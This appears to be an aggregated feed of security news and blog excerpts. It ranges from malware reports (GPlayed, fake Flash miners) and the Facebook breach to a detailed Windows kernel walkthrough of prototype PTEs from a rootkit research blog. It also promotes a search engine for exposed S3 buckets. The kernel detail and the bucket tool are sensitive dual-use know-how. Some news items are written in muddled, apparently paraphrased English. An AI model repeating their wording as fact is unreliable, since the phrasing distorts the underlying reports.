Author Archives:

E Hacking News – Latest Hacker News and IT Security News: Apple Launches Privacy Website; Focus on the Protection of User’s Personal Data





Apple on Wednesday launched a refreshed privacy website https://www.apple.com/privacy/ updating the minisite to offer better education to its customers making them aware as to how the company attempts to safeguard the user's personal data across all of its products and services.

The privacy minisite covers a variety of areas, offering as much as much information to users about the iPhone producer's approach to handling and anchoring user information. With the abundance of data put away on an iPhone, iPad, or Mac, Apple is also quick to offer clarifications and explanations to its user base, with the end goal to keep building trust between the company and the population who purchases its services and products.

The privacy website will advise the users on how to protect their information while giving them access to various new approaches to comprehend Apple’s privacy as a “fundamental human right” philosophy and deal with their data appropriately.

To limit individual information, iOS and macOS devices are presently being built to have the capacity to process locally, gather only reason-specific data and randomise information to guarantee that it isn't identifiable at a granular level. What a considerable number of companies are doing on the cloud utilizing their servers, Apple is now doing on the device, all credit to the powerful chips like the A12 Bionic.

The Opening Message on the new site –
“At Apple, we believe privacy is a fundamental human right. And so much of your personal information — information you have a right to keep private — lives on your Apple devices. Your heart rate after a run. Which news stories you read first. Where you bought your last coffee. What websites you visit. Who you call, email, or message. Every Apple product is designed from the ground up to protect that information. And to empower you to choose what you share and with whom.”

On the new website, Apple has one again elucidated that just when the new v “Information and Security” icon shows up does it request for personal information. All the various other administrations where this icon does not show up, does not require personal information from the users.



E Hacking News - Latest Hacker News and IT Security News

/r/netsec – Information Security News & Discussion: buckets.grayhatwarfare.com – open s3 buckets search engine is updated!

Hello,

Since you guys loved us so much, we really tried our best to keep up with the expectations.

We are happy to announce the launch of the new version of the tool.

Whats new:

  • A lot of you asked to be able to ignore buckets on the search results. From today you can do that.
  • You can now sort results and bucket contents by size.
  • Search was limited to filename. Now keywords can be matched in the directory of the file.
  • Sometimes files are listed but are not accessible. Not accessible files are noted as such to save you time clicking.
  • Project is completely rewritten from Slim Framework to Symfony.

Try it here: https://buckets.grayhatwarfare.com/

If you don't know what grayhatwarfare.com is you can read this: https://medium.com/@grayhatwarfare/how-to-search-for-open-amazon-s3-buckets-and-their-contents-https-buckets-grayhatwarfare-com-577b7b437e01

More info on the release and a peek on whats to come: https://blog.grayhatwarfare.com/2018/10/12/buckets-grayhatwarfare-com-open-s3-buckets-search-engine-is-updated/

Thanks for the support!

submitted by /u/grayhatwarfare
[link] [comments]

/r/netsec - Information Security News & Discussion

CYBER ARMS – Computer Security: Basic Security Testing with Kali Linux Giveaway Contest

Want a chance to get a signed copy of my latest Kali Linux book? I am giving away a total of 10 signed copies of “Basic Security Testing with Kali Linux, 3rd Edition”!

Simply follow, like and share this article, or my official Twitter or Instagram announcement, for a chance to win a signed copy of my new book!

10 lucky winners will be randomly selected on October 31st.

The Contest is for those living in the United States only. I may do another one for international readers in the future.

Liking this article & sharing the Official Contest announcements on Twitter and Instagram will increase your chances of winning.  Winners will be notified on October 31st. If a winner cannot be notified or does not respond by the end of the first week of November, another winner will be picked.

Good luck!

 







CYBER ARMS – Computer Security

Securosis Blog: Disrupt:Ops: What Security Managers Need to Know About Amazon S3 Exposures (2/2)

Posted under:

What Security Managers Need to Know About Amazon S3 Exposures (2/2)

Our first Disrupt:Ops post discussed how exposure of S3 data becomes such a problem, with some details on how buckets become public in the first place. This post goes a bit deeper, before laying a foundation for how to manage S3 to avoid these mistakes yourself.

- Rich (0) Comments Subscribe to our daily email digest

Securosis Blog

Matt Flynn: Information Security | Identity & Access Mgmt.: Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Matt Flynn: Information Security | Identity & Access Mgmt.

E Hacking News – Latest Hacker News and IT Security News: A Trojan App on Google Play Store Stealing Users Sensitive Data





Cyber security specialists at Cisco Talos have discovered a malware denominated as GPlayed, a Google Play Market Place application that is indistinguishable to the design of Google Play store icon and other subsidiary applications. GPlayed is capable for deceiving users into installing it on their Android phone and lose sensitive data to hackers.

This issue is a risky one as clueless many gullible users may install the app. on the given that it is a reliable one indeed and wind up paying a "heavy price".

This dangerous Trojan malware in spite of the fact that isn't yet live on the Google Play store yet is capable of and even transmitting Visa or bank details present in the phone and furthermore swing in to fulltime spyware equipped for following victim’s locations.

"What makes this malware extremely powerful is the capability to adapt after it's deployed. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed," Cisco Talos report said.




Adding further they said that their analysis indicates that this Trojan is in its testing stage but given its potential, every mobile user should be aware of GPlayed. As mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means. But GPlayed is an example of where this can go wrong, especially if a mobile user is not aware of how to distinguish a fake app versus a real one.

In spite of Google taking strict measures to control the stream of Android malware to the Play app store, it can't recognize Trojan malware covered up in authentic applications. General Android application users are thus advised to be cautious in installing, such resembling phony Google applications.



E Hacking News - Latest Hacker News and IT Security News

TheXploit: He Needed to Recharge My AC Unit

My air conditioner is a lifeline for me in the summer months here in New York City. Even when the temperature is in the 70s, I like to turn it on because my house can become quite stuffy. When the temperatures are in the 80s or 90s, it becomes an absolute necessity. Well, I had […]

TheXploit

E Hacking News – Latest Hacker News and IT Security News: Adobe Flash Updates: Camouflaging Crypto-mining Malware!




It has been found out, since early August days, the crypto-currency looters have been ingeniously hiding mining malware in genuine updates of Adobe Flash.

As mentioned by some cyber-security researchers, it turns out that the mining actions were occurring with the help of a spurious updater which was on the go ever since early August. With an assertion to install a legitimate Flash update, the fraudulent file slips inside of the device a crypto-currency mining bot that goes by the name of XMRig with the aim of mining Monero the most sought after a privacy coin.

Over 110 samples of such fake updates were discovered by some researchers with ‘Adobe Flash Player’ prefixed on the files. It could be considered that users are pointed towards the files by way of hoax URLs.

Later, when the URL downloads and installs an authentic Flash update, the mining bot connects itself to a Monero mining pool and begins the job. The actual sure-shot procedure is still not known. 

When examined the spoofy URLs were found out to be perfectly harmless and nothing suspicious could be suspected.

As per conventional behavior of the mining malware, the infected system does the prime work and redirects any mined Monero to a single wallet.

The most enigmatic part of the play is that the user has no idea about the Flash update’s illegitimacy as the malware is shrouded by the veil of an update and that the CPU of the user is going crazy, mining crypto-currency for some goons.

“Monero” has always been the first choice of cyber-looters. That’s exactly why it’s no surprise that according to a vague research, every month around more than $250,000 worth Monero is mined via fraudulent browser-based mining scripts.

Adobe hasn’t made any revealing comment as of now regarding the subject, but some research organizations are working hard towards minimizing the number of Monero-related cyber-crime. 


E Hacking News - Latest Hacker News and IT Security News

A blog about rootkits research and the Windows kernel: What is a Proto-PTE and how Windows VMM works with it

A Proto-PTE (Prototype PTE, PPTE) is a basic block of the Windows VMM (Virtual Memory Manager) for help of which the OS can work with memory-mapped files (or Sections in the Native/NT kernel API terms). What I have learned from discussions with Windows Internals researchers, and my own experience, the PPTE is most tricky stuff a researcher can face with. But, in fact, here is nothing complicated with PPTE concept understanding if we can view at it from right side. Honestly, it was already eleven years ago when I defended my coursework at the university that named "Inside Windows XP VMM". I have uploaded its Russian edition to famous KM forum. It was written in SoftICE times when you could break the Windows kernel execution with Ctrl-X and debug a local system without remote actions. :)
That my coursework has covered a lot of VMM subsystems, including, Hyperspace, PTEs, Session space, WSL, PFN database, Sections, Cache Internals. But, unfourtunately, it has been oriented only on x86 architecture. Thus, I took my chapters dedicated to PTE and Section, and has adapted them for actual x64 architecture on today. I have started to learn Windows Internals since 2nd version of the book of the series was released (Inside Windows 2000). Windows Internals and Rootkits are both my favs directions of researching on today as it was more than ten years ago.

A PPTE (that actually is a kind of Software PTE, SPTE) is an original basic block of the VMM that helps it to attach to specific proctess a new view of already mapped section. Mentioned SPTE term just means that the OS organizes structure of such always Invalid PTE by itself, i. e. CPU doesn't know anything about this structure. A task of CPU in dispatching such SPTE (Invalid PTE) is just to interrupt execution of a current thread and forward execution to the NT Kernel KiPageFault (KiTrap0E) handler (formally belongs to Interruption Managers or VMM).

To understand how Windows works with PPTE, let's put attention to the following structures.
  • Section (nt!_SECTION). The kernel structure that describes section object.
  • Segment (nt!_SEGMENT). Actually is a core structure of PPTE architecture that contains PPTE page table.
  • Segment Control Area (SCA, nt!_CONTROL_AREA). Along with SEGMENT is a key structure of Section and for understanding how PPTE works. Control area is intended for storing information that helps VMM to perform I/O operations to read data from file or to write data into it.
  • Subsection (nt!_SUBSECTION`). Is a data structure that contains a necessary information for calculation an offset inside mapped file via PPTEs
Let's talk about each of them more detailed.
As we can see from the picture above, clients (threads) from separate processes can create sections for one specific file to execute it. For example, all Windows processes use kernel32.dll library that is mapped as section in every process. Basic SECTION structure represents a kernel object that is created when a thread tries to create memory-mapped file. If section is created for a file for the first time, the OS has to initialize related kernel structures like SEGMENT and CONTROL_AREA to describe that memory-mapped file, including, PPTE table. From other side, if a thread tries to create section for the file that already has corresponding VMM structs, its newly created section just attaches a specific SEGMENT. When a client calls Windows API to map some range of file into memory, the VMM just takes corresponding to allocated VM PTEs and performs attaching them to PPTE and these SPTEs now is called the PTE Pointed to Prototype (PTEPP).

Let's look at major fields of the section structure.


 typedef struct _SECTION
{
      struct _RTL_BALANCED_NODE SectionNode;
      UINT64 StartingVpn; //starting virtual page number of mapping
      UINT64 EndingVpn; //ending virtual page number
      union
      {
            struct _CONTROL_AREA* ControlArea; //ptr to corresponding control area
            struct _FILE_OBJECT* FileObject; //or to file object
            struct
            {
                  UINT64 RemoteImageFileObject : 1; //for remote files cases
                  UINT64 RemoteDataFileObject : 1;
            };
      }u1;
      UINT64 SizeOfSection; //size of section
      union
      {
            ULONG32 LongFlags;
            struct _MMSECTION_FLAGS Flags; //flags from ZwCreateSection
      }u;
      struct
      {
            ULONG32 InitialPageProtection : 12;
            ULONG32 SessionId : 19;
            ULONG32 NoValidationNeeded : 1;
      };
}SECTION, *PSECTION;

Below you can see CA structure format.

typedef struct _CONTROL_AREA
{
      struct _SEGMENT* Segment; //ptr to corresponding segment
      union
      {
            struct _LIST_ENTRY ListHead;
            VOID* AweContext;
      };
      UINT64 NumberOfSectionReferences; 
      UINT64 NumberOfPfnReferences;
      UINT64 NumberOfMappedViews; //count of sections that have been mapped with this CA
      UINT64 NumberOfUserReferences;
    ...
      union
      {
            struct
            {
                  union
                 {                                                                                         
                        ULONG32 NumberOfSystemCacheViews;
                        ULONG32 ImageRelocationStartBit;
                  };                                                                                        
                 union
                 {
                       LONG32 WritableUserReferences;
                       struct
                       {
                             ULONG32 ImageRelocationSizeIn64k : 16;
                             ULONG32 LargePage : 1;
                             ULONG32 AweSection : 1;
                             ULONG32 SystemImage : 1;
                             ULONG32 StrongCode : 2;
                             ULONG32 CantMove : 1;
                             ULONG32 BitMap : 2;
                             ULONG32 ImageActive : 1;
                             ULONG32 ImageBaseOkToReuse : 1;
                       };
                 };
                 union
                 {
                       ULONG32 FlushInProgressCount;
                       ULONG32 NumberOfSubsections;
                       struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;
                 };
            }e2;
      }u2;
      ...                                                                            
}CONTROL_AREA, *PCONTROL_AREA; //defines section's properties that are actual for all clients

When a client requests unmap view of section operation, Windows just removes links to corresponding PPTE entries from process's PTE that describes a view of mapped section. Thus, PPTE is comfortable and universal interface for attaching view and detaching it from the specific process address space. And this is its major purpose. The Segment structure contains pointer to PPTE table as we can see below.

typedef struct _SEGMENT
{
      struct _CONTROL_AREA* ControlArea; //-> ptr to corresponding CA
      ULONG32      TotalNumberOfPtes;
      struct _SEGMENT_FLAGS SegmentFlags;
      UINT64 NumberOfCommittedPages;
      UINT64 SizeOfSegment;
      ...
      struct _MMPTE* PrototypePte; //-> PPTE table that are pointing to Subsections
}SEGMENT, *PSEGMENT;

Another key structure for understanding how Windows uses PPTE to work with Section (memory-mapped file) is so-called Subsection (nt!_SUBSECTION). Subsection is a data structure that contains a necessary information for calculation an offset inside mapped file via PPTEs, which are described this file. For usual binary file there is always (with some exceptions) a single subsection, but for an executable PE files there is one subsection for each PE section plus another one for PE header. A subsection is intended for storing memory protection constants for all PTEs that contain specific PE file section, i. e. VMM will assign to all PTEs that are pointed by Subsection memory protection constant from Sybsection structure.

All PPTEs are referencing to specific subsection, in case of mapping section as binary, all PPTEs will point to single subsection, in case of mapping section as executable, PPTEs will point to specific PE's section subsection. A subsection contains so-called starting sector field that describes beginning of specific section inside PE file (takes this value from PE header - Raw Section Offset / SECTOR_SIZE). Also a subsection contains a pointer to first PPTE in the PPTE table of specific Segment and total number of PPTEs for itself (i. e. number of pages for specific PE section that, in fact, represents its VirtualSize that is rounded to be multiple with PAGE_SIZE).

If we have address of  PPTE, we can easy calculate offset inside PE file that this PTE describes (as a distance between base and current PTE). If Pte variable is a pointer to current PPTE, than we can calculate an address of Subsection.

(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / sizeof(PTE)) << PAGE_SHIFT + Subsection->StartingSector * SECTOR_SIZE

If Subsection – address of subsection, than first PPTE describes, FirstPte = &Subsection->SubsectionBase[0], and last range, LastPte = &Subsection->SubsectionBase[Subsection->PtesInSubsection]. I. e. if X – address of the section in memory and its Pte, than &Subsection->SubsectionBase[0] <= Pte < &Subsection->SubsectionBase[Subsection->PtesInSubsection].

typedef struct _SUBSECTION
{
      struct _CONTROL_AREA* ControlArea;
      struct _MMPTE* SubsectionBase;
      struct _SUBSECTION* NextSubsection;
    ...                                                                             
      union
      {
            ULONG32 LongFlags;
            struct _MMSUBSECTION_FLAGS SubsectionFlags;
      }u;                                                                                         
      ULONG32 StartingSector;                                                               
      ULONG32 NumberOfFullSectors;                                                           
      ULONG32 PtesInSubsection;                                                             
     ...
}SUBSECTION, *PSUBSECTION;

                 
typedef struct _MMSUBSECTION_FLAGS
{
      struct
      {
            UINT16 SubsectionAccessed : 1;
            UINT16 Protection : 5;
            UINT16 StartingSector : 10;
      };                                                                       
      struct
      {
            UINT16 SubsectionStatic : 1;
            UINT16 GlobalMemory : 1;
            UINT16 Spare : 1;
            UINT16 OnDereferenceList : 1;
            UINT16 SectorEndOffset : 12;
      };                                                                       
}MMSUBSECTION_FLAGS, *PMMSUBSECTION_FLAGS;      

Let's take a real example.

> !process 0 0

PROCESS ffffca0cabb485c0
    SessionId: 0  Cid: 07d0    Peb: ef0697b000  ParentCid: 0338
    DirBase: 13692000  ObjectTable: ffffb981ce2b7380  HandleCount: 149.
    Image: VSSVC.exe

> !handle 0 3 ffffca0cabb485c0

0030: Object: ffffb981c8277a50  GrantedAccess: 00000003 (Inherit) Entry: ffffb981ce3c70c0
Object: ffffb981c8277a50  Type: (ffffca0ca8c71c50) Directory
    ObjectHeader: ffffb981c8277a20 (new version)
        HandleCount: 43  PointerCount: 1407269
        Directory Object: ffffb981c7c16b20  Name: KnownDlls

        Hash Address          Type                      Name
        ---- -------          ----                      ----
         00  ffffb981c8287c10 Section                   kernel32.dll

> !object ffffb981c8287c10

Object: ffffb981c8287c10  Type: (ffffca0ca8d0ada0) Section
    ObjectHeader: ffffb981c8287be0 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: ffffb981c8277a50  Name: kernel32.dll

> dt _SECTION ffffb981c8287c10 -r1

nt!_SECTION
   +0x000 SectionNode      : _RTL_BALANCED_NODE
    ...
   +0x018 StartingVpn      : 0
   +0x020 EndingVpn        : 0
   +0x028 u1               : <unnamed-tag>
      +0x000 ControlArea      : 0xffffca0c`aa900880 _CONTROL_AREA
      +0x000 FileObject       : 0xffffca0c`aa900880 _FILE_OBJECT
      +0x000 RemoteImageFileObject : 0y0
      +0x000 RemoteDataFileObject : 0y0
   +0x030 SizeOfSection    : 0xae000
 ...

> !ca 0xffffca0c`aa900880

ControlArea  @ ffffca0caa900880
  Segment      ffffb981c8297cb0  Flink      ffffca0cabb4d230  Blink        ffffca0caab19e00
  Section Ref                 1  Pfn Ref                  6f  Mapped Views               2a
  User Ref                   2b  WaitForDel                0  Flush Count               a88
  File Object  ffffca0caa900c90  ModWriteCount             0  System Views             348f
  WritableRefs           c0000b 
  Flags (a0) Image File

      \Windows\System32\kernel32.dll

Segment @ ffffb981c8297cb0
  ControlArea     ffffca0caa900880  BasedAddress  00007ffbcb640000
  Total Ptes                    ae
  Segment Size               ae000  Committed                    0
  Image Commit                   2  Image Info    ffffb981c8297cf8
  ProtoPtes       ffffb981c7f24a90
  Flags (c4820000) ProtectionMask

> dq ffffb981c7f24a90

ffffb981`c7f24a90  8a000000`37295121 00000000`2c624860
ffffb981`c7f24aa0  0a000000`2c625121 0a000000`2c626121
ffffb981`c7f24ab0  0a000000`2c627121 0a000000`2c628121 -> Subsection address

We can also take a real example from my coursework for 32bit Windows XP SP3. Let's take a specific cache slot, because creation of PPTE may be delayed in Ring 3 process before someone performed access to it. Print list of slots. For example, at my machine, the next items are existing. In this case, cache manager mapped binary system registry file named NTUSER.DAT. As this file is mapped as binary, here will exist only one subsection for it.

Vacb #186    0x81936170 -> 0xc7080000
File: 0x81749818
Offset: 0x00080000
\Documents and Settings\Art\NTUSER.DAT

We can see that this slot maps file with offset 0x80000 and base address 0xc7080000. 

0: kd> !pte 0xc7080000
               VA c7080000
PDE at   C0300C70        PTE at C031C200
contains 01CF0963      contains 0554A921
pfn 1cf0 -G-DA--KWEV    pfn 554a -G--A—KREV

A PTE is valid, than we can restore a content of PPTE from PFN database.

0: kd> !pfn 554a
    PFN 0000554A at address 8107FEF0
    flink       000018C8  blink / share count 00000001  pteaddress E15B7208
    reference count 0001   Cached     color 0
    restore pte 86D204CE  containing page        00496E  Active      P      
      Shared         
   
Now we have that PPTE address is 0xE15B7208 and its original content is 0x86D204CE. We can translate it to subsection with formula. 

SubsectionAddress = MmNonPagedPoolStart + PrototypeIndex << 3.

86D204CE = 1 00001101101001000000 1 00110 0111 0
       |        |
       |        |->is ptr to subsection
       |->is mapped file
000011011010010000000111 = DA407 * 8 + 81181000 = 6D2038 + 81181000 = 81853038

Print a subsection.

> dt _subsection 81853038
nt!_SUBSECTION
   +0x000 ControlArea      : 0x81853008 _CONTROL_AREA
   +0x004 u                : __unnamed
   +0x008 StartingSector   : 0
   +0x00c NumberOfFullSectors : 0x100
   +0x010 SubsectionBase   : 0xe15b7008 _MMPTE
   +0x014 UnusedPtes       : 0
   +0x018 PtesInSubsection : 0x100
   +0x01c NextSubsection   : (null)

and

+0x004 u                : __unnamed
      +0x000 LongFlags        : 0x60
      +0x000 SubsectionFlags  : _MMSUBSECTION_FLAGS
         +0x000 ReadOnly         : 0y0
         +0x000 ReadWrite        : 0y0
         +0x000 SubsectionStatic : 0y0
         +0x000 GlobalMemory     : 0y0
         +0x000 Protection       : 0y00110 (0x6) - MM_EXECUTE_READWRITE
         +0x000 LargePages       : 0y0
         +0x000 StartingSector4132 : 0y0000000000 (0)
         +0x000 SectorEndOffset  : 0y000000000000 (0)

Print control area.

> dt _control_area 0x81853008 
nt!_CONTROL_AREA
   +0x000 Segment          : 0xe1559ba0 _SEGMENT
   +0x004 DereferenceList  : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x00c NumberOfSectionReferences : 1
   +0x010 NumberOfPfnReferences : 0xe5
   +0x014 NumberOfMappedViews : 4
   +0x018 NumberOfSubsections : 1
   +0x01a FlushInProgressCount : 0
   +0x01c NumberOfUserReferences : 0
   +0x020 u                : __unnamed
   +0x024 FilePointer      : 0x81749818 _FILE_OBJECT
   +0x028 WaitingForDeletion : (null) 
   +0x02c ModifiedWriteCount : 0
   +0x02e NumberOfSystemCacheViews : 4

Number of subsections – 1, because it was mapped as binary. 

As a result.
  • Get an offset, from which into slot of the cache files was mapped (E15B7208 - e15b7008) / 4 *1000 + 0 = 80000, as we can see in VACB.
  • Protection bits for virtual pages are granting maximum rights - MM_EXECUTE_READWRITE as we can see into PPTE Protection fiels – 110, i. e. 6.
Let's take more interesting stuff with executable section ole32.dll.

> !ca 817ab818   

ControlArea  @ 817ab818
  Segment      e172eaa0  Flink      00000000  Blink        00000000
  Section Ref         1  Pfn Ref          8f  Mapped Views       13
  User Ref           14  WaitForDel        0  Flush Count         0
  File Object  81847da0  ModWriteCount     0  System Views        0

  Flags (90000a0) Image File HadUserReference Accessed 
                                 |
                 |->mapped as image

      File: \WINDOWS\system32\ole32.dll

Segment @ e172eaa0
  ControlArea     817ab818  BasedAddress  774e0000
  Total Ptes           13d
  WriteUserRef           0  SizeOfSegment   13d000
  Committed              0  PTE Template  862a8c3a
  Based Addr      774e0000  Image Base           0
  Image Commit           7  Image Info    e172efd0
  ProtoPtes       e172ead8


Subsection 1 @ 817ab848
  ControlArea  817ab818  Starting Sector        0  Number Of Sectors    2
  Base Pte     e172ead8  Ptes In Subsect        1  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

Subsection 2 @ 817ab868
  ControlArea  817ab818  Starting Sector        2  Number Of Sectors  8f8
  Base Pte     e172eadc  Ptes In Subsect      11f  Unused Ptes          0
  Flags              31  Sector Offset          0  Protection           3

Subsection 3 @ 817ab888
  ControlArea  817ab818  Starting Sector      8fa  Number Of Sectors   30
  Base Pte     e172ef58  Ptes In Subsect        6  Unused Ptes          0
  Flags              31  Sector Offset          0  Protection           3

Subsection 4 @ 817ab8a8
  ControlArea  817ab818  Starting Sector      92a  Number Of Sectors   33
  Base Pte     e172ef70  Ptes In Subsect        7  Unused Ptes          0
  Flags              51  Sector Offset          0  Protection           5

Subsection 5 @ 817ab8c8
  ControlArea  817ab818  Starting Sector      95d  Number Of Sectors    c
  Base Pte     e172ef8c  Ptes In Subsect        2  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

Subsection 6 @ 817ab8e8
  ControlArea  817ab818  Starting Sector      969  Number Of Sectors   69
  Base Pte     e172ef94  Ptes In Subsect        e  Unused Ptes          0
  Flags              11  Sector Offset          0  Protection           1

It's comfortable to present results inside table. I have used PETools and we can see that ole32 cjntains five sections and first is reserved for the header.
  • We can see that subsections 2-3, which are mapped to PE sections .text and .orpc are executable, i. e. adress PPTE with code sections. Fourth subsection belongs to global data and has copy-on-write protection. Other are using only for read access.
  • Second subsection describes first section inside PE file with executable code. In fact, it begins from second sector (400 / SECTOR_SIZE == 2). Virtual address of section is 0x11ef5e, i. e. with rounding to multiple page size 0x11ef5e + 0xA2 = 0x11F000 / PAGE_SIZE =  0x11F, i. e. number of PTEs in subsection. Raw size in header is 0x11f000 / 0x200 = 0x8F8, i. e. number of sectors in subsection.
  • Third section that also contains an executable code and begins from sector 0x11F400 / 0x200 = 0x8FA. Size is 0x6000 (in this case we take physical, because it larger than virtual, i. e. 0x6000/0x1000 = 6 PTEs.
  • Forth subsection begins 0x125400 / 0x200 = 0x92A, size 0x7000 / 0x1000 = 7 PTEs.
  • Fifth 0x12BA00 / 0x200 = 0x95D, size 0x2000 / 0x1000 = 2 PTEs.
  • Sixth 0x12D200 / 0x200 = 0x969, 0xE000 / 0x1000 = 0xE PTEs.
As final step, let's check pointed above formula at practice. Take 3rd subsection, which describes section of ole32.dll starting from offset (in sectors) 0x8fa.

> dt _subsection 817ab888 SubsectionBase
nt!_SUBSECTION
   +0x010 SubsectionBase : 0xe172ef58 _MMPTE

Get content of the first PTE that describes this section.

0: kd> dd 0xe172ef58 l1
e172ef58  0c779121

It is valid, than.

0: kd> !pfn c779
    PFN 0000C779 at address 8112B358
    flink       000006E7  blink / share count 00000007  pteaddress E172EF58
    reference count 0001   Cached     color 0
    restore pte 862A8C62  containing page        00B8A9  Active      P      
      Shared        

862A8C62 = 1 00001100010101010001 1 00011 0001 0;
000011000101010100010001 = C5511 * 8 + 81181000 = 817AB888, this is an address of our subsection.

Now, using pointer to PPTE, get an offset inside file that it describes with help of formula.
(((PUCHAR)Pte - (PUCHAR)Subsection->SubsectionBase) / 4) << 12 + Subsection->StartingSector * SECTOR_SIZE.
(E172EF58 - 0xE172EF58) = 0 + 8fa * 200 = 11F400, that we can find in our table above.


A blog about rootkits research and the Windows kernel

E Hacking News – Latest Hacker News and IT Security News: Hackers Accessed Personal Details of 29M Facebook Users



Facebook has become extraordinarily sensitive and hence susceptible to data breaches, a recuperating Facebook from the Cambridge Analytica injury says attackers accessed contact details of 29 million users — encompassing broad spheres of information from phone numbers and email addresses to more intimate details like check-ins and recent searches. The mass data breach came as a lasting bruise to the largest social network’s authenticity and deep-rooted user trust. 

Referencing from the Friday’s statement, the attackers illegally acquired access tokens for 30 million accounts, which allowed them to have a full-fledged access to those profiles from where they extracted basic contact information (name and contact no./email address). More detailed information like hometown, location, birthdates, gender and recent places they checked into were extracted for 14 million accounts.
The rest one million accounts, though affected, but were not subjected to any information extraction.

Responding to the security breach, Facebook pledged to send customized messages to the 30 million users whose accounts fall prey to what they have labeled as a “fairly broad” breach. Reportedly, the breach despite its magnitude has been indifferent enough to spare the third-party apps that were linked to the Facebook accounts of the users as Facebook said no data was accessed from the third-party apps — Whatsapp, Instagram or  Messenger.

An ongoing investigation by Facebook implies that the service providers are not ruling out the possibility of less destructive but more oblique attacks that use a similar mechanism.  Aside from that, the hackers used an automated program to navigate through accounts and extract the data rapidly, but notably, they didn’t perform any activity while they were logged in.

Facebook’s Vice President of product management, Guy Rosen said in a call with reporters, “We take these incidents really, really seriously,”

Facebook told that the FBI is investigating the hack, but has refused to disclose further details — perpetrators behind the attack, to be precise.  Facebook will not disclose the breakdowns of the affected users’ location, said a company executive on a conference call.

A Reddit user’s take on the probable horrors of the breach justifies the concern of the panicked users, apple-hacck writes,

 “many people use the same passwords across accounts (my first thought). But in the case of a Facebook data breach, since the personal details were accessed, they can commit identity fraud because they have your face (if you have a profile picture), phone number- cause many people to link their numbers to Facebook, and your name. All of which can be used to convince a bank or other institution that it is you trying to access the account.”


In the wake of the exacerbated concerns, Patrick Moorhead, founder of Moor Insights & Strategy, says, “Facebook should provide all those customers free credit monitoring to make sure the damage is minimized.”


E Hacking News - Latest Hacker News and IT Security News

E Hacking News – Latest Hacker News and IT Security News: A Proposed Amendment to the Chicago Municipal Code That Could Invade Biometric and Location Privacy



As the utilization of facial recognition programming in the private sector is on the high very aggressively and exponentially, a proposed amendment to the Chicago municipal code would now enable organizations to utilize this facial recognition innovation, as indicated by the Electronic Frontier Foundation (EFF).

The EFF proceeds to state that this law would likewise disregard the Illinois Biometric Information Act (BIPA) including further that it could "invade biometric and location privacy, and violate a pioneering state privacy law adopted by Illinois a decade ago.” 

EFF went ahead to add -

"At its core, facial recognition technology is an extraordinary menace to our digital liberties. Unchecked, the expanding proliferation of surveillance cameras, coupled with constant improvements in facial recognition technology, can create a surveillance infrastructure that the government and big companies can use to track everywhere we go in public places, including who we are with and what we are doing.
This system will deter law-abiding people from exercising their First Amendment rights in public places. Given continued inaccuracies in facial recognition systems, many people will be falsely identified as dangerous or wanted on warrants, which will subject them to unwanted—and often dangerous—interactions with law enforcement. This system will disparately burden people of colour, who suffer a higher 'false positive' rate due to additional flaws in these emerging systems."

The proposition looks to include a section of "Face Geometry Data" to the city's municipal code which would enable organizations to utilize the disputable face reconnaissance frameworks compatible to the licensing agreements with the Chicago Police Department.

The law basically requires organizations to acquire informed, opt-in consent from people before gathering biometric data from them, or revealing it to an outsider and also secure storage for the biometric data all the while setting a three-year constrain on maintenance of the acquired data after which it must be deleted.

The EFF has likewise not been in support of the FBI's accumulation of colossal databases of biometric information on Americans. The Next Generation Identification (NGI) incorporates fingerprints, face recognition, iris outputs and palm prints. The data is accumulated amid arrests and non-criminal cases, for example, immigration, individual verifications or background checks and state licensing.

Regardless of the huge potential the facial recognition technology and biometric innovation in general, holds for the increased welfare, keeping in mind the national security and the advancements to cyber security, many have advisedly forewarned that the technology should be improved before its continual utilization before something extreme impacts the users.



E Hacking News - Latest Hacker News and IT Security News

SolarWinds MSP Blog: The ingredients of a nutritious security burrito

Years ago, antivirus (AV) was often considered the backbone of cybersecurity. Many IT professionals figured AV was enough to prevent their users from falling victim to a cyberattack. 

However, the industry has now shifted to a “defense-in-depth” model, otherwise known as “layered security.” We realized that AV wasn’t enough. Patch management alone wasn’t enough. Businesses had to start combining several layers of defense to combat cybercriminals.

Read More

SolarWinds MSP Blog

Blog | Avast EN: Google+ ending and CA is no state for weak passwords | Avast

Google+ to go offline after security breach discovered

Following an exposé by WSJ that revealed Google had kept a huge bug in their Google+ social network under wraps, the search giant has decided to shut it down by late 2019. The bug might have enabled malicious apps to extract profile data such as name, gender, email address, occupation, and age. To make matters worse, Google isn’t sure how many profiles could have been compromised as they only keep log data for two weeks.



Blog | Avast EN

Trail of Bits Blog: Introduction to Verifiable Delay Functions (VDFs)

Finding randomness on the blockchain is hard. A classic mistake developers make when trying to acquire a random value on-chain is to use quantities like future block hashes, block difficulty, or timestamps. The problem with these schemes is that they are vulnerable to manipulation by miners. For example, suppose we are trying to run an on-chain lottery where users guess whether the hash of the next block will be even or odd. A miner then could bet that the outcome is even, and if the next block they mine is odd, discard it. Here, tossing out the odd block slightly increases the miner’s probability of winning the lottery. There are many real-world examples of “randomness” being generated via block variables, but they all suffer from the unavoidable problem that it is computationally easy for observers to determine how choices they make will affect the randomness generated on-chain.

